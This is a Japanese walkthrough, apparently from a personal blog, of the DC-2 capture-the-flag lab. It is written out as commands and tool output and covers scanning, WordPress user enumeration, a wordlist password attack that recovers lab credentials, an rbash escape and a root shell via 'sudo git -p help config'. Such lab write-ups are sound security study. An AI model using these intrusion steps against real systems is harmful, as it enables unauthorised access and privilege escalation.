Capture The Frog

かえるぴょこぴょこw

MENU

DC-2 Write Up

 virtual boxでDC-2を起動させて、ターミナルで

 

┌──(root💀snowyowl)-[~] 
└─# netdiscover 11 Captured ARP Req/Rep packets, from 7 hosts. Total size: 516
IP At MAC Address Count Len MAC Vendor / Hostname
------------------------------------------------------------
192.168.3.13 08:00:27:a8:0d:dc 1 60 PCS Systemtechnik GmbH
192.168.3.1 30:f7:72:be:b9:b9 4 168 >Hon Hai Precision Ind. Co.,Ltd. 192.168.3.2 10:6f:3f:e6:28:40 1 60 BUFFALO.INC
192.168.3.7 44:09:b8:8c:f4:72 1 60 Salcomp (Shenzhen) CO., LTD. 192.168.3.14 9e:29:3c:88:76:24 1 42 Unknown vendor
192.168.3.15 70:bc:10:6a:f6:c1 2 84 Microsoft Corporation 192.168.10.1 30:f7:72:be:b9:b9 1 42 Hon Hai Precision Ind. Co.,Ltd.

virtualboxは、PCS Systemtechnik GmbHなので、DC-2のローカルipは、192.168.3.13である。

 

nmapでこのipを確認する。

ここで使っているオプション

-sSは、ステルススキャンで3ハンドシェイクのACKパケットを返さない。

-Aは、OSとその細かいバージョンの特定

-p-は、全ポート指定(0と9100を除く

 

┌──(root💀snowyowl)-[~] 
└─# nmap -sS -A 192.168.3.13 -p- Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 20:15 JST Nmap scan report for dc-2 (192.168.3.13) Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION 80/tcp
open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 08:00:27:A8:0D:DC (Oracle VirtualBox virtual NIC) Device type: general purpose Running:
Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details:
Linux 3.2 - 4.9 Network Distance:
1 hop Service Info: OS: Linux;
CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.60 ms dc-2 (192.168.3.13) OS and Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds

 

このnmapの結果から、

・このサーバーはwebサーバーである。(Apache2.4.10、CMSwordpressが使われている。

・普通22番ポートがsshのはずなのだが、これは7744番ポートに設定されている。

というこの2つがわかる。

 

webサーバーということで、ブラウザでipを入力すると。。。

f:id:QWERTYtan:20210727235244p:plain

 

ローカルwebサーバーなので、DNSに問い合わせしても、出てこない。

なので、/etc/hostsを書き換える。

 f:id:QWERTYtan:20210727235154p:plain

 

hostsファイルに追記すると、

 

きちんと表示される。f:id:QWERTYtan:20210727235402p:plain

                                                                            

次に、niktoで公開ディレクトリを探る。                                                                                                                                                 


┌──(root💀snowyowl)-[~]
└─# nikto -h http://192.168.3.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.3.13
+ Target Hostname:    192.168.3.13
+ Target Port:        80
+ Start Time:         2021-07-27 19:35:47 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ Uncommon header 'link' found, with multiple values: (<http://dc-2/index.php/wp-json/>; rel="https://api.w.org/",<http://dc-2/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2021-07-27 19:37:12 (GMT9) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

前回のDC-1は、公開ディレクトリが多くあったが、今回は全然ない。

wordpressのログインするディレクトリがわかった。

(/wp-login.php: Wordpress login found

 

webサーバーのApache脆弱性も探すが、目立ったexploitがない。                                                                                                                                                                                                                   

                                                                                                                                                                                                                   

┌──(root💀snowyowl)-[~]
└─# searchsploit "Apache 2.4.10" 
-----------------------------------------------------------------
 Exploit Title      
| Path ----------------------------------------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
| php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
| linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service
| multiple/dos/26710.txt
Apache OpenSSL - 'OpenFuck.c' Remote BufferOverflow
| unix/remote/21671.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)
| unix/remote/764.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
| unix/remote/47080.c
Apache OpenMeetings - '.ZIP' File Directory Traversal
| linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing
| multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
| unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
| multiple/remote/6229.txt
-----------------------------------------------------------------
Shellcodes: No Results

 

webサーバーからは、攻められないことがわかったので、CMSから攻めていくことにする。前回のDC-1と同じ流れで、DC-1は、drupalでした。

 

wpsには、wpscanという公式が配布しているセキュリティーツールがあるので、これを使う。

https://ja.wordpress.org/plugins/wpscan/

wpscanには、面白いオプションが多くあるので、

$man wpscan

で色々見てみると参考になる。

今回のオプション

--url URLで、対象のURLを指定する。

-e uで、ユーザー名を出力。



┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -e u                                   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:08:38 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
 |  - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 27 21:08:44 2021
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.674 KB
[+] Data Received: 514.805 KB
[+] Memory used: 160.348 MB
[+] Elapsed time: 00:00:06

・ユーザーは、admin・jerry・tomの 3つ

が分かったので、この3つのアカウントのユーザー名とパスワードを探す。

 

dc-2のwebページのflagのところに、cewlを使うといいと書いているので、

cewlコマンドを使う。

cewlは、webページの文字からランダムに単語を生み出す。

種つきパスワードジェネレータ。



┌──(root💀snowyowl)-[~]
└─# cewl -w dc2-password.txt http://dc-2/

 

cewlで作ったパスワードテキストを指定して、3つのアカウントのパスワードを

探す。

-P パスワードファイルで、辞書攻撃。

 

┌──(root💀snowyowl)-[~]
└─# cewl -w dc2-password.txt http://dc-2/

cewlで作ったパスワードテキストを指定して、3つのアカウントのパスワードを 探す。 -P パスワードファイルで、辞書攻撃。

┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -P dc2-passworrd.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:10:03 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
 |  - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - 
Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs -
Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Xmlrpc against 3 user/s [SUCCESS] - jerry / adipiscing [SUCCESS] - tom / parturient Trying admin /
log Time: 00:01:26 <========> (646 / 1121) 57.62% ETA: ??:??:?? [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Tue Jul 27 21:11:38 2021 [+] Requests Done: 801 [+] Cached Requests: 49 [+] Data Sent: 360.183 KB [+] Data Received: 427.544 KB [+] Memory used: 243.969 MB [+] Elapsed time: 00:01:34

2つのアカウントのパスワードが分かった。

・ | Username: jerry, Password: adipiscing
  | Username: tom, Password: parturient

これを使って、DC-2のwordpress管理者画面にログインする。

さっきのniktoでわかったログインディレクトリに移動して、ログインする。

f:id:QWERTYtan:20210727235519p:plain


flag2を確認するとまだflagがあることがわかる。

次は、nmapで調べてわかったsshでDC-2に接続する。

ここで、


    $ssh tom@192.168.3.13

としても、接続できない。

このサーバーのsshポートは7744なので、ポートを指定する必要がある。


    $ssh tom@192.168.3.13 -p 7744

パスワードをきかれるが、さっき分かったパスワードを入力する。

 

lsコマンドで表示すると、flag3.txtを発見。

catコマンドで開こうとしても開けない

-rbashでコマンドに制限がかかっているからである。

普段の環境では、chshコマンドで-rbashからbashに移れるのだが、DC-2では移れない。

そのため、

 


    BASH_CMDS[a]=/bin/sh;a
    /bin/bash
    export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin

 

を使って、bashに移行する。

flag3.txtを表示すると、f:id:QWERTYtan:20210727235239p:plain

 



となる。

flag4

f:id:QWERTYtan:20210727235452p:plain

 

どうやら、管理者権限になってほしいらしい。

管理者権限になろうと、sudoコマンドなどを入力してもうまくいかない。

そのため、

sudo git -p help config

を使う。

インタラクティブなシステムシェルを生成することによって、今回のような制限された環境から抜け出せる。

https://gtfobins.github.io/gtfobins/git/

sudoコマンドが使える環境であれば、使えるので汎用性高そう。

rootに移って、catコマンドで表示する。

f:id:QWERTYtan:20210727235150p:plain